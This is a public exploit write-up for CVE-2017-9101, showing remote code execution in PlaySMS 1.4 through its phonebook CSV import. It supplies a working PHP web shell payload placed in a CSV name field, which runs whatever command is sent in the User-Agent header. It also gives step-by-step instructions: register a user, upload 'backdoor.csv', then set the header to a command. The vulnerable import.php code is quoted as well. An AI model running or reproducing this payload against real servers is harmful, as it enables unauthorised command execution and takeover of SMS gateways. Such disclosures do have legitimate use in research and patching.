-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathCVE-2017-9101
127 lines (99 loc) · 5.03 KB
/
CVE-2017-9101
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
# Exploit Title: PlaySMS 1.4 Remote Code Execution using Phonebook import Function in import.php
# Date: 21-05-2017
# Software Link: https://playsms.org/download/
# Version: 1.4
# Exploit Author: Touhid M.Shaikh
# Contact: http://twitter.com/touhidshaikh22
# Website: http://touhidshaikh.com/
# Category: webapps
PoC:
https://www.youtube.com/watch?v=KIB9sKQdEwE
https://www.exploit-db.com/exploits/42044/
1. Description
Code Execution using import.php
We know import.php accept file and just read content
not stored in server. But when we stored payload in our backdoor.csv
and upload to phonebook. Its execute our payload and show on next page in field (in NAME,MOBILE,Email,Group COde,Tags) accordingly .
In My case i stored my vulnerable code in my backdoor.csv files's Name field .
But There is one problem in execution. Its only execute in built function and variable which is used in application.
That why the server not execute our payload directly. Now i Use "<?php $a=$_SERVER['HTTP_USER_AGENT']; system($a); ?>" in name field and change our user agent to any command which u want to execute command. Bcz it not execute <?php system("id")?> directly .
Example of my backdoor.csv file content
----------------------MY FILE CONTENT------------------------------------
Name Mobile Email Group code Tags
<?php $t=$_SERVER['HTTP_USER_AGENT']; system($t); ?> 22
--------------------MY FILE CONTENT END HERE-------------------------------
For More Details : www.touhidshaikh.com/blog/
For Video Demo : https://www.youtube.com/watch?v=KIB9sKQdEwE
2. Proof of Concept
Login as regular user (created user using index.php?app=main&inc=core_auth&route=register):
Go to :
http://127.0.0.1/playsms/index.php?app=main&inc=feature_phonebook&route=import&op=list
And Upload my malicious File.(backdoor.csv)
and change our User agent.
This is Form For Upload Phonebook.
----------------------Form for upload CSV file ----------------------
<form action=\"index.php?app=main&inc=feature_phonebook&route=import&op=import\" enctype=\"multipart/form-data\" method=POST>
" . _CSRF_FORM_ . "
<p>" . _('Please select CSV file for phonebook entries') . "</p>
<p><input type=\"file\" name=\"fnpb\"></p>
<p class=text-info>" . _('CSV file format') . " : " . _('Name') . ", " . _('Mobile') . ", " . _('Email') . ", " . _('Group code') . ", " . _('Tags') . "</p>
<p><input type=\"submit\" value=\"" . _('Import') . "\" class=\"button\"></p>
</form>
------------------------------Form ends ---------------------------
-------------Read Content and Display Content-----------------------
case "import":
$fnpb = $_FILES['fnpb'];
$fnpb_tmpname = $_FILES['fnpb']['tmp_name'];
$content = "
<h2>" . _('Phonebook') . "</h2>
<h3>" . _('Import confirmation') . "</h3>
<div class=table-responsive>
<table class=playsms-table-list>
<thead><tr>
<th width=\"5%\">*</th>
<th width=\"20%\">" . _('Name') . "</th>
<th width=\"20%\">" . _('Mobile') . "</th>
<th width=\"25%\">" . _('Email') . "</th>
<th width=\"15%\">" . _('Group code') . "</th>
<th width=\"15%\">" . _('Tags') . "</th>
</tr></thead><tbody>";
if (file_exists($fnpb_tmpname)) {
$session_import = 'phonebook_' . _PID_;
unset($_SESSION['tmp'][$session_import]);
ini_set('auto_detect_line_endings', TRUE);
if (($fp = fopen($fnpb_tmpname, "r")) !== FALSE) {
$i = 0;
while ($c_contact = fgetcsv($fp, 1000, ',', '"', '\\')) {
if ($i > $phonebook_row_limit) {
break;
}
if ($i > 0) {
$contacts[$i] = $c_contact;
}
$i++;
}
$i = 0;
foreach ($contacts as $contact) {
$c_gid = phonebook_groupcode2id($uid, $contact[3]);
if (!$c_gid) {
$contact[3] = '';
}
$contact[1] = sendsms_getvalidnumber($contact[1]);
$contact[4] = phonebook_tags_clean($contact[4]);
if ($contact[0] && $contact[1]) {
$i++;
$content .= "
<tr>
<td>$i.</td>
<td>$contact[0]</td>
<td>$contact[1]</td>
<td>$contact[2]</td>
<td>$contact[3]</td>
<td>$contact[4]</td>
</tr>";
$k = $i - 1;
$_SESSION['tmp'][$session_import][$k] = $contact;
}
}
------------------------------code ends ---------------------------
Bingoo.....